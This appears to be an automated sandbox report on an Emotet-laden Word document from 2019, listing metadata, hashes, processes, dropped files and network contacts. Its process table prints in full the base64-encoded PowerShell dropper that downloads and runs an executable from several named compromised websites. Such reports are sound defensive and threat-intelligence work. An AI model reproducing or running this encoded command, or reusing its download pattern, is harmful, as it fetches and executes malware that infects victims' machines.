File name: | DOC_IHCAW27DY27AB_09192019.doc |
Full analysis: | https://app.any.run/tasks/44514b18-30e4-4ddf-99a2-aa99bae10dca |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 19, 2019, 11:24:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: red connecting, Subject: Human, Author: Mike Effertz, Comments: National zero tolerance Intelligent Fresh Chips, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 843DC73E0488ACC78CED7B9AA4B3E643 |
SHA1: | 87FF766C3BC585AE52F7DDFD189D557B7D353014 |
SHA256: | 0DB51B17F0D92714FDD4A4622D20B084519761A539B211417CE790A47E7D3549 |
SSDEEP: | 6144:zXtY2WaPaQxUk+MclQDgQO+PLkI27NSU4jJntATfD7TPsOuptq:zdY2WaPaQxUk+MclQDgQO8X27NSU4Vef |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Greenholt |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 641 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | Lemke, Becker and Klocko |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 547 |
Words: | 95 |
Pages: | 1 |
ModifyDate: | 2019:09:19 06:46:00 |
CreateDate: | 2019:09:19 06:46:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | National zero tolerance Intelligent Fresh Chips |
Keywords: | - |
Author: | Mike Effertz |
Subject: | Human |
Title: | red connecting |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DOC_IHCAW27DY27AB_09192019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3524 | powershell -encod JABwADgAMQBUAFkAagBJAEgAPQAnAHoAdQBQADUAUwBVADQAdQAnADsAJABrADQANwBwAHAATQA2AEkAIAA9ACAAJwA1ADcAMgAnADsAJABsADUAMABvAHIAagBZAD0AJwBkADEAaQA5AEUAUABqAEEAJwA7ACQASgBXAFQAcwBtAHMAcgBYAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABrADQANwBwAHAATQA2AEkAKwAnAC4AZQB4AGUAJwA7ACQAZABrAEsANAAyADkAPQAnAFQAVgBUAEsAagBGACcAOwAkAEsAbwBaAFoAOQBLADkAdgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASwBiAEwAagBPAEcAcgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAGkAdgBlAG4AdAB1AHIAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAeQBPAHIARQBTAEQALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAdAByAHUAYwB0AHUAcgBlAHMALQBtAGEAZABlAC0AZQBhAHMAeQAuAGMAbwAuAHUAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEMAUABtAEIAVABtAHQATwAvAEAAaAB0AHQAcABzADoALwAvAG8AZgBmAHMAaQBkAGUAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHMAZQBrAGkAbABsAGUAcgAvAHgAQwBWAGwAUAB4AEgAWQAvAEAAaAB0AHQAcABzADoALwAvAHAAcgBhAG0AbwBkAGsAdQBtAGEAcgBzAGkAbgBnAGgALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAHAAagBxAF8AdQBvAGcAcQBqADUANwBoADEALQA1ADEAMQA4ADcAMAA0ADIAOQAwAC8AQABoAHQAdABwADoALwAvAGgAZQBhAGwAdABoAGsAbgBvAHcAbABlAGQAZwBlAC4AbQB5AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZwBpADcAagBlAGEAbwBsADQAbQBfADAAYwBrAGUAMQBxADAAeQAtADcANgAvACcALgAiAHMAYABwAEwAaQBUACIAKAAnAEAAJwApADsAJABDADMAcABzAEEAdgA9ACcAUwBLAFEAUgB6AEMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFcARABoAE0AaQA5AGEAIABpAG4AIAAkAEsAYgBMAGoATwBHAHIAegApAHsAdAByAHkAewAkAEsAbwBaAFoAOQBLADkAdgAuACIARABPAGAAdwBOAEwAbwBgAEEAYABkAEYASQBsAGUAIgAoACQAVwBEAGgATQBpADkAYQAsACAAJABKAFcAVABzAG0AcwByAFgAKQA7ACQAVwBkAFMAOQBqAEEASAByAD0AJwBBAGgAcgBZAFEAWQB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASgBXAFQAcwBtAHMAcgBYACkALgAiAEwAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgAwADEAMQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEoAVwBUAHMAbQBzAHIAWAApADsAJABSAG0ARwB6AFUAOABoAD0AJwBSAE4AVgBpAGEAdQBHAHcAJwA7AGIAcgBlAGEAawA7ACQAQwB2ADkAbwBqAHUAdAA9ACcAdQAzAGoAegAyAEoAaAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAbQBpAGEAXwB0AFEAPQAnAE4AbwBLAGwAaABmAEoANQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B9B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:40B12BB4BC48E9A76D75084ED5B821EE | SHA256:26AF021ACBB88243DC9BF5A067C03EFDF5A59DEA4851D03B564EB1A7A66821D9 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DOC_IHCAW27DY27AB_09192019.doc.LNK | lnk | |
MD5:F71365CE2620029FF7488367F6DB0C4F | SHA256:6748CF00DE8360DDB8942CD78DAD13C805763FF3C055C5B5F7A37DB6A7008988 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62974EB1.wmf | wmf | |
MD5:EB349FABF33A91016509C265CF5E0952 | SHA256:53DFD1822D1F24BCF0C90FCD015CA0B5D2067DEF880E4019A148D236DF833A30 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44AECE29.wmf | wmf | |
MD5:D3A1178740A674E24247D1B765183F60 | SHA256:DCB47BA0455656C2FD46A1EDD13945EB747BC287FC84647EA079E3293F3B3529 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D27BF523.wmf | wmf | |
MD5:564F63D9771E73A85CFC507A7220188B | SHA256:AB95951A441ABA1AD887307A37C6DEC78D1EA0F4D744AFF588B704DB4691E83B | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:25E30CB313F07C6D11C461D10FBF7405 | SHA256:10E2D6E40290EF8A46940E86642DC3E8E245712DB0BB2E54A7016CDABED01B40 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90F9168D.wmf | wmf | |
MD5:2571C728EFEAD164EAEB8CD85DEC1714 | SHA256:AE326092646BCDC6F10DDD40D8F3CBCB321FD2269650DE8F5EE87F985437C38B | |||
2868 | WINWORD.EXE | C:\Users\admin\Desktop\~$C_IHCAW27DY27AB_09192019.doc | pgc | |
MD5:B6FDEC56FAAF4EA006930FC5884DF7DC | SHA256:1DAE560CEA9A6498E49B7A74F92DCA3B80F5C72EE790E39560F4FEA9E1678639 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F18E3B1F.wmf | wmf | |
MD5:73EDE7EA9069565FB3973240F0BE62A2 | SHA256:8E79541368A12EA9B3D9216E1D8B876BC66D2B4EBB11F79054A190B47554C0F4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3524 | powershell.exe | GET | 404 | 104.28.3.238:80 | http://healthknowledge.my/wp-includes/gi7jeaol4m_0cke1q0y-76/ | US | xml | 345 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3524 | powershell.exe | 104.28.18.13:443 | aniventure.co.uk | Cloudflare Inc | US | shared |
3524 | powershell.exe | 104.28.3.238:80 | healthknowledge.my | Cloudflare Inc | US | shared |
3524 | powershell.exe | 35.178.150.201:443 | www.structures-made-easy.co.uk | Amazon.com, Inc. | GB | unknown |
3524 | powershell.exe | 145.14.144.213:443 | offside2.000webhostapp.com | Hostinger International Limited | US | shared |
3524 | powershell.exe | 145.14.144.130:443 | pramodkumarsingh.000webhostapp.com | Hostinger International Limited | US | shared |
Domain | IP | Reputation |
---|---|---|
aniventure.co.uk |
| malicious |
www.structures-made-easy.co.uk |
| unknown |
offside2.000webhostapp.com |
| shared |
pramodkumarsingh.000webhostapp.com |
| shared |
healthknowledge.my |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |